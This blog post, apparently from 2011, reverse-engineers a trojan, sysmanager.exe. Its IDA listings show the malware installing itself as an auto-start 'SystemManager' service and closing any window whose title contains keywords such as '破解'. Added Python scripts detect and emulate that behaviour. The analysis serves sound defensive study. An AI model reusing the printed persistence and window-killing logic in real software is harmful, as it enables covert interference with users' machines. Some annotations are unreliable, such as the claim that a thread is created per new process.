Thursday, August 4, 2011

Reverse-engineering analysis of sysmanager.exe

Author: 古越魂
Time: 2011-07-15, 20:23:50

For the past few days my computer has been unusually slow for no obvious reason, and some web pages would shut the browser down the moment they opened, which was frustrating. A scan with antivirus software found nothing at all... so, reluctantly, manual removal looked like the more reliable route. Since the pages that triggered it all contained words like "cracking" and "reverse engineering", I suspected the thing was keying on those words, so I created a new file named "逆向破解.txt" and opened it in Notepad. Sure enough: it closed as soon as it opened. Opening it with EditPlus gave the same result, while opening it under a different file name worked normally.
Because this happened to every process, my first suspicion was DLL injection, but comparing the DLLs of two such processes showed nothing suspicious beyond the system DLLs, and injecting into a system DLL seemed unlikely, so I had to look elsewhere.
I booted the machine in safe mode and noted the process list, then booted normally and noted the process list again, and eliminated the processes one by one.
After repeated testing I pinned it on the sysmanager.exe process: with that process killed, everything ran normally again. A quick Baidu search for the process name confirmed it is a trojan. Cleaned up the registry, deleted the program, and done, virus removed!!!
That should have been the end of it, but I had nothing better to do, and this thing had annoyed me no end!!! So I decided to analyse it.
PEiD packer check: Microsoft Visual C++ 6.0
Good news. On to IDA + OD, then.

Code:
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
.text:004014F0 _WinMain@16 proc near ; CODE XREF: start+12Fp
.text:004014F0
.text:004014F0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004014F0 var_8 = dword ptr -8
.text:004014F0 var_4 = dword ptr -4
.text:004014F0 hInstance = dword ptr 4
.text:004014F0 hPrevInstance = dword ptr 8
.text:004014F0 Str1 = dword ptr 0Ch
.text:004014F0 nShowCmd = dword ptr 10h
.text:004014F0
.text:004014F0 sub esp, 10h
.text:004014F3 call sub_401000
.text:004014F8 call ds:GetCurrentThreadId
.text:004014FE mov dword_403068, eax
.text:00401503 xor eax, eax
.text:00401505 mov [esp+10h+var_8], eax
.text:00401509 mov [esp+10h+var_4], eax
.text:0040150D mov eax, [esp+10h+Str1]
// Check whether the command line is the uninstall switch; if so, delete the service and uninstall the program
.text:00401511 push offset Str2 ; "/uninstall"
.text:00401516 push eax ; Str1
.text:00401517 mov [esp+18h+ServiceStartTable.lpServiceName], offset ServiceName ; "SystemManager"
.text:0040151F mov [esp+18h+ServiceStartTable.lpServiceProc], offset loc_401450
.text:00401527 call ds:_stricmp
.text:0040152D add esp, 8
.text:00401530 test eax, eax
.text:00401532 jnz short loc_401541
.text:00401534 call sub_401220
.text:00401539 xor eax, eax
.text:0040153B add esp, 10h
.text:0040153E retn 10h
.text:00401541 ; ---------------------------------------------------------------------------
.text:00401541
.text:00401541 loc_401541: ; CODE XREF: WinMain(x,x,x,x)+42j
.text:00401541 call sub_401040
.text:00401546 lea ecx, [esp+10h+ServiceStartTable]
// Use of the function StartServiceCtrlDispatcherA
// For each newly created process, create a thread that performs the check
.text:0040154A push ecx ; lpServiceStartTable
.text:0040154B call ds:StartServiceCtrlDispatcherA
.text:00401551 xor eax, eax
.text:00401553 add esp, 10h
.text:00401556 retn 10h
.text:00401556 _WinMain@16 endp



typedef struct _SERVICE_TABLE_ENTRY {
  LPTSTR lpServiceName;
  LPSERVICE_MAIN_FUNCTION lpServiceProc;
} SERVICE_TABLE_ENTRY, *LPSERVICE_TABLE_ENTRY;
// As filled in by WinMain above: lpServiceName = "SystemManager", lpServiceProc = loc_401450 (0x401450)


// Copy sysmanager.exe into the system directory and create an auto-start service
.text:00401040 sub esp, 220h
.text:00401046 lea eax, [esp+220h+NewFileName]
.text:0040104A push ebx
.text:0040104B push esi
.text:0040104C push edi
.text:0040104D push 100h ; uSize
.text:00401052 push eax ; lpBuffer
.text:00401053 call ds:GetSystemDirectoryA
.text:00401059 mov edi, offset aSysmanager_exe ; "\\sysmanager.exe"
.text:0040105E or ecx, 0FFFFFFFFh
.text:00401061 xor eax, eax
.text:00401063 lea edx, [esp+22Ch+NewFileName]
.text:00401067 repne scasb
.text:00401069 not ecx
.text:0040106B sub edi, ecx
.text:0040106D push 104h ; nSize
.text:00401072 mov esi, edi
.text:00401074 mov ebx, ecx
.text:00401076 mov edi, edx
.text:00401078 or ecx, 0FFFFFFFFh
.text:0040107B repne scasb
.text:0040107D mov ecx, ebx
.text:0040107F dec edi
.text:00401080 shr ecx, 2
.text:00401083 rep movsd
.text:00401085 mov ecx, ebx
.text:00401087 lea eax, [esp+230h+ExistingFileName]
.text:0040108E and ecx, 3
.text:00401091 push eax ; lpFilename
.text:00401092 rep movsb
.text:00401094 push 0 ; hModule
// Get the program's own file name
.text:00401096 call ds:GetModuleFileNameA
.text:0040109C lea ecx, [esp+22Ch+NewFileName]
.text:004010A0 push 0 ; bFailIfExists
.text:004010A2 lea edx, [esp+230h+ExistingFileName]
.text:004010A9 push ecx ; lpNewFileName
.text:004010AA push edx ; lpExistingFileName
// Copy the file
.text:004010AB call ds:CopyFileA
.text:004010B1 test eax, eax
.text:004010B3 jnz short loc_4010BF
.text:004010B5 pop edi
.text:004010B6 pop esi
.text:004010B7 pop ebx
.text:004010B8 add esp, 220h
.text:004010BE retn
.text:004010BF ; ---------------------------------------------------------------------------
.text:004010BF
.text:004010BF loc_4010BF: ; CODE XREF: sub_401040+73j
.text:004010BF push 0F003Fh ; dwDesiredAccess
.text:004010C4 push 0 ; lpDatabaseName
.text:004010C6 push 0 ; lpMachineName
// Open the service control manager
.text:004010C8 call ds:OpenSCManagerA
.text:004010CE test eax, eax
.text:004010D0 mov hSCObject, eax
.text:004010D5 jnz short loc_4010E1
.text:004010D7 pop edi
.text:004010D8 pop esi
.text:004010D9 pop ebx
.text:004010DA add esp, 220h
.text:004010E0 retn
.text:004010E1 ; ---------------------------------------------------------------------------
.text:004010E1
.text:004010E1 loc_4010E1: ; CODE XREF: sub_401040+95j
.text:004010E1 push 0 ; lpPassword
.text:004010E3 push 0 ; lpServiceStartName
.text:004010E5 push offset Dependencies ; lpDependencies
.text:004010EA push 0 ; lpdwTagId
.text:004010EC lea ecx, [esp+23Ch+NewFileName]
.text:004010F0 push 0 ; lpLoadOrderGroup
.text:004010F2 push ecx ; lpBinaryPathName
.text:004010F3 mov ebx, 2
.text:004010F8 push 1 ; dwErrorControl
.text:004010FA push ebx ; dwStartType
.text:004010FB push 110h ; dwServiceType
.text:00401100 push 0F01FFh ; dwDesiredAccess
.text:00401105 push offset ServiceName ; "SystemManager"
.text:0040110A push offset ServiceName ; "SystemManager"
.text:0040110F push eax ; hSCManage
// Create the service
.text:00401110 call ds:CreateServiceA
.text:00401116 mov esi, ds:GetLastError
.text:0040111C mov dword_403060, eax
.text:00401121 test eax, eax
.text:00401123 jnz short loc_40117C
.text:00401125 call esi ; GetLastError
.text:00401127 cmp eax, 431h
.text:0040112C jz short loc_401147
.text:0040112E mov edx, hSCObject
.text:00401134 push edx ; hSCObject
.text:00401135 call ds:CloseServiceHandle
.text:0040113B pop edi
.text:0040113C pop esi
.text:0040113D xor eax, eax
.text:0040113F pop ebx
.text:00401140 add esp, 220h
.text:00401146 retn
.text:00401147 ; ---------------------------------------------------------------------------
.text:00401147
.text:00401147 loc_401147: ; CODE XREF: sub_401040+ECj
.text:00401147 mov eax, hSCObject
.text:0040114C push 10h ; dwDesiredAccess
.text:0040114E push offset ServiceName ; "SystemManager"
.text:00401153 push eax ; hSCManager
// Open the service
.text:00401154 call ds:OpenServiceA
.text:0040115A test eax, eax
.text:0040115C mov dword_403060, eax
.text:00401161 jnz short loc_40117C
.text:00401163 mov ecx, hSCObject
.text:00401169 push ecx ; hSCObject
.text:0040116A call ds:CloseServiceHandle
.text:00401170 pop edi
.text:00401171 pop esi
.text:00401172 xor eax, eax
.text:00401174 pop ebx
.text:00401175 add esp, 220h
.text:0040117B retn


// Delete the service
sub_401220 proc near ; CODE XREF: WinMain(x,x,x,x)+44p
.text:00401220 push esi
.text:00401221 push 0F003Fh ; dwDesiredAccess
.text:00401226 push 0 ; lpDatabaseName
.text:00401228 push 0 ; lpMachineName
.text:0040122A call ds:OpenSCManagerA
.text:00401230 test eax, eax
.text:00401232 mov hSCObject, eax
.text:00401237 jz loc_4012C3
.text:0040123D push 0F01FFh ; dwDesiredAccess
.text:00401242 push offset ServiceName ; "SystemManager"
.text:00401247 push eax ; hSCManager
.text:00401248 call ds:OpenServiceA
.text:0040124E test eax, eax
.text:00401250 mov dword_403060, eax
.text:00401255 jz short loc_4012C3
.text:00401257 push offset ServiceStatus ; lpServiceStatus
.text:0040125C push eax ; hService
.text:0040125D call ds:QueryServiceStatus
.text:00401263 cmp ServiceStatus.dwCurrentState, 4
.text:0040126A jnz short loc_40127F
.text:0040126C mov eax, dword_403060
.text:00401271 push offset ServiceStatus ; lpServiceStatus
.text:00401276 push 1 ; dwControl
.text:00401278 push eax ; hService
.text:00401279 call ds:ControlService
.text:0040127F
.text:0040127F loc_40127F: ; CODE XREF: sub_401220+4Aj
.text:0040127F mov ecx, dword_403060
.text:00401285 push ecx ; hService
.text:00401286 call ds:DeleteService
.text:0040128C test eax, eax
.text:0040128E jz short loc_4012AB
.text:00401290 mov edx, hSCObject
.text:00401296 mov esi, ds:CloseServiceHandle
.text:0040129C push edx ; hSCObject
.text:0040129D call esi ; CloseServiceHandle
.text:0040129F mov eax, dword_403060
.text:004012A4 push eax ; hSCObject
.text:004012A5 call esi ; CloseServiceHandle
.text:004012A7 xor eax, eax
.text:004012A9 pop esi
.text:004012AA retn
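The persistence that this uninstall routine undoes is the one sub_401040 creates: a service named "SystemManager" whose binary is the copy dropped into the system directory. As an added example (not the author's code and not the malware's), the following Python script looks for that registration in the Services registry hive, which is where the manual registry cleanup above took place; the registry walk needs Windows, while classify_service() is pure and runs anywhere.

```python
SERVICE_NAME = "SystemManager"       # lpServiceName passed to CreateServiceA
DROPPED_FILE = "sysmanager.exe"      # file copied into GetSystemDirectoryA() by sub_401040
SERVICE_AUTO_START = 2               # dwStartType = 2 (ebx) in the listing
SERVICE_WIN32_OWN_PROCESS = 0x010    # dwServiceType 0x110 = own process | interactive
SERVICE_INTERACTIVE_PROCESS = 0x100

def classify_service(name, image_path, start, svc_type):
    """Return the indicators a service record matches; an empty list means clean."""
    hits = []
    if name.lower() == SERVICE_NAME.lower():
        hits.append("name")
    if DROPPED_FILE in (image_path or "").lower():
        hits.append("image_path")
    # Auto-start interactive own-process services are rare but not unique to this
    # sample, so the start/type shape is only reported alongside a name/path hit.
    interactive_own = (svc_type & SERVICE_WIN32_OWN_PROCESS) and (svc_type & SERVICE_INTERACTIVE_PROCESS)
    if hits and start == SERVICE_AUTO_START and interactive_own:
        hits.append("auto_start_interactive")
    return hits

def scan_services_registry():
    """Walk HKLM\\SYSTEM\\CurrentControlSet\\Services (Windows only) and classify each key."""
    import winreg  # only available on Windows
    findings = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        index = 0
        while True:
            try:
                sub = winreg.EnumKey(root, index)
            except OSError:          # ERROR_NO_MORE_ITEMS ends the enumeration
                break
            index += 1
            values = {}
            with winreg.OpenKey(root, sub) as key:
                for value_name in ("ImagePath", "Start", "Type"):
                    try:
                        values[value_name] = winreg.QueryValueEx(key, value_name)[0]
                    except OSError:  # value absent on this key
                        values[value_name] = None
            hits = classify_service(sub, values["ImagePath"], values["Start"], values["Type"] or 0)
            if hits:
                findings.append((sub, values["ImagePath"], hits))
    return findings

if __name__ == "__main__":          # Windows only; classify_service() runs anywhere
    for name, path, hits in scan_services_registry():
        print(f"{name}: {path} -> {', '.join(hits)}")
```

Stop the service before deleting the dropped file, as the uninstall routine does, or the copy in the system directory will be in use.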



.text:00401450 loc_401450: ; DATA XREF: WinMain(x,x,x,x)+2Fo
.text:00401450 push offset sub_4012D0
.text:00401455 push offset ServiceName ; "SystemManager"
.text:0040145A mov ServiceStatus.dwCurrentState, 2
.text:00401464 mov ServiceStatus.dwControlsAccepted, 3
.text:0040146E call ds:RegisterServiceCtrlHandlerA
.text:00401474 test eax, eax
.text:00401476 mov hServiceStatus, eax
.text:0040147B jz short locret_4014E4
.text:0040147D push esi
.text:0040147E mov esi, ds:SetServiceStatus
.text:00401484 push offset ServiceStatus
.text:00401489 push eax
.text:0040148A call esi ; SetServiceStatus
.text:0040148C mov eax, hServiceStatus
.text:00401491 push offset ServiceStatus
.text:00401496 push eax
.text:00401497
.text:00401497 __cfltcvt_init:
.text:00401497 mov ServiceStatus.dwWin32ExitCode, 0
.text:004014A1 mov ServiceStatus.dwCheckPoint, 0
.text:004014AB mov ServiceStatus.dwWaitHint, 0
.text:004014B5 mov ServiceStatus.dwCurrentState, 4
.text:004014BF call esi ; SetServiceStatus
.text:004014C1 push 0
.text:004014C3 push 0
.text:004014C5 push 0
.text:004014C7 push offset sub_401380
.text:004014CC push 0
.text:004014CE push 0
.text:004014D0 call ds:CreateThread
.text:004014D6 test eax, eax
.text:004014D8 pop esi
.text:004014D9 jz short locret_4014E4
.text:004014DB push 0FFFFFFFFh
.text:004014DD push eax
.text:004014DE call ds:WaitForSingleObject
.text:004014E4
.text:004014E4 locret_4014E4: ; CODE XREF: .text:0040147Bj
.text:004014E4 ; .text:004014D9j
.text:004014E4 retn


For each newly created process, a thread is created; the thread function is at sub_401380.

sub_401380 proc near ; DATA XREF: .text:004014C7o
.text:00401380
.text:00401380 String = byte ptr -104h
.text:00401380
.text:00401380 sub esp, 104h
.text:00401386 push ebx
.text:00401387 mov ebx, ds:_mbsstr
.text:0040138D push esi
.text:0040138E push edi
.text:0040138F
.text:0040138F loc_40138F: ; CODE XREF: sub_401380+47j
.text:0040138F ; sub_401380+BEj
.text:0040138F push 3E8h ; dwMilliseconds
.text:00401394 call ds:Sleep
.text:0040139A xor eax, eax
.text:0040139C mov ecx, 19h
.text:004013A1 mov edi, offset dword_403094
.text:004013A6 push eax ; lParam
.text:004013A7 rep stosd
.text:004013A9 push offset EnumFunc ; lpEnumFunc
.text:004013AE mov dword_403224, 0
.text:004013B8 call ds:EnumWindows // enumerate windows
.text:004013BE mov eax, dword_403224
.text:004013C3 xor edi, edi
.text:004013C5 test eax, eax
.text:004013C7 jle short loc_40138F
.text:004013C9 mov esi, offset dword_403094
.text:004013CE
.text:004013CE loc_4013CE: ; CODE XREF: sub_401380+BCj
.text:004013CE mov eax, [esi]
.text:004013D0 test eax, eax
.text:004013D2 jz short loc_401431
.text:004013D4 lea ecx, [esp+110h+String]
.text:004013D8 push 80h ; nMaxCount
.text:004013DD push ecx ; lpString
.text:004013DE push eax ; hWnd
.text:004013DF call ds:GetWindowTextA // get the window text
.text:004013E5 test eax, eax
.text:004013E7 jz short loc_401431
.text:004013E9 lea edx, [esp+110h+String]
.text:004013ED push offset unk_403040
.text:004013F2 push edx
.text:004013F3 call ebx ; _mbsstr
.text:004013F5 add esp, 8
.text:004013F8 test eax, eax
.text:004013FA jnz short loc_401422
.text:004013FC lea eax, [esp+110h+String]
.text:00401400 push offset aI ; "專用"
.text:00401405 push eax
.text:00401406 call ebx ; _mbsstr // check for the keyword: 專用
.text:00401408 add esp, 8
.text:0040140B test eax, eax
.text:0040140D jnz short loc_401422
.text:0040140F lea ecx, [esp+110h+String]
.text:00401413 push offset aT ; "破解"
.text:00401418 push ecx
.text:00401419 call ebx ; _mbsstr // check for the keyword: 破解
.text:0040141B add esp, 8
.text:0040141E test eax, eax
.text:00401420 jz short loc_401431
.text:00401422
.text:00401422 loc_401422: ; CODE XREF: sub_401380+7Aj
.text:00401422 ; sub_401380+8Dj
.text:00401422 mov edx, [esi]
.text:00401424 push 0 ; lParam
.text:00401426 push 0 ; wParam
.text:00401428 push 10h ; Msg
.text:0040142A push edx ; hWnd
.text:0040142B call ds:SendMessageA // send message 10h (WM_CLOSE) to close the process
.text:00401431
.text:00401431 loc_401431: ; CODE XREF: sub_401380+52j
.text:00401431 ; sub_401380+67j ...
.text:00401431 mov eax, dword_403224
.text:00401436 inc edi
.text:00401437 add esi, 4
.text:0040143A cmp edi, eax
.text:0040143C jl short loc_4013CE
.text:0040143E jmp loc_40138F
.text:0040143E sub_401380 endp
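To make the trigger in sub_401380 concrete, here is an added Python emulation of the title check (not code from the post or from the malware). It assumes the victim's ANSI code page is GB18030 and leaves out unk_403040, the first keyword, because it is not recovered on the page; it reproduces the author's observation that a file named "逆向破解.txt" gets its Notepad window closed while a renamed copy survives, and also shows that GetWindowTextA's 80h-byte buffer hides keywords that sit past the first 127 bytes of a title.

```python
from typing import List, Tuple

WM_CLOSE = 0x10                   # Msg pushed before SendMessageA at loc_401422
TITLE_BUF = 0x80                  # nMaxCount given to GetWindowTextA
ANSI_CODEPAGE = "gb18030"         # assumption: victim's ANSI code page (not stated on the page)
# aI and aT from the listing; unk_403040, the first keyword, is not recovered on the page.
KEYWORDS = [k.encode(ANSI_CODEPAGE) for k in ("專用", "破解")]

def get_window_text_a(title: str, n_max_count: int = TITLE_BUF) -> bytes:
    """GetWindowTextA copies at most n_max_count-1 bytes of the ANSI title."""
    return title.encode(ANSI_CODEPAGE, errors="replace")[: n_max_count - 1]

def title_matches(title: str) -> bool:
    """True when the _mbsstr chain (loc_4013E9 .. loc_40141E) finds a keyword.
    Plain byte search approximates _mbsstr, which additionally honours lead bytes."""
    buf = get_window_text_a(title)
    if not buf:                   # GetWindowTextA returned 0 -> jz loc_401431, window skipped
        return False
    return any(keyword in buf for keyword in KEYWORDS)

def scan_windows(windows: List[Tuple[int, str]]) -> List[Tuple[int, int]]:
    """One pass of the loop at loc_4013CE over the (hWnd, title) pairs collected by
    EnumFunc; returns the (hWnd, Msg) pairs SendMessageA would be called with."""
    sent = []
    for hwnd, title in windows:
        if hwnd == 0:             # NULL handle -> jz loc_401431, next entry
            continue
        if title_matches(title):
            sent.append((hwnd, WM_CLOSE))
    return sent

if __name__ == "__main__":
    # Constructed titles: the author's test file name, a renamed copy, and a NULL handle.
    demo = [(0x10010, "逆向破解.txt - 記事本"), (0x10020, "notes.txt - 記事本"), (0, "破解")]
    print(scan_windows(demo))     # [(65552, 16)]
```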
Some thoughts:
That concludes the analysis; I finally know what was going on, and I also learned a new function, StartServiceCtrlDispatcherA. It's a nice function, ideal for file monitoring, and you can filter on keywords too, for example blocking every web page about cracking and reverse engineering. Good stuff, learned something.
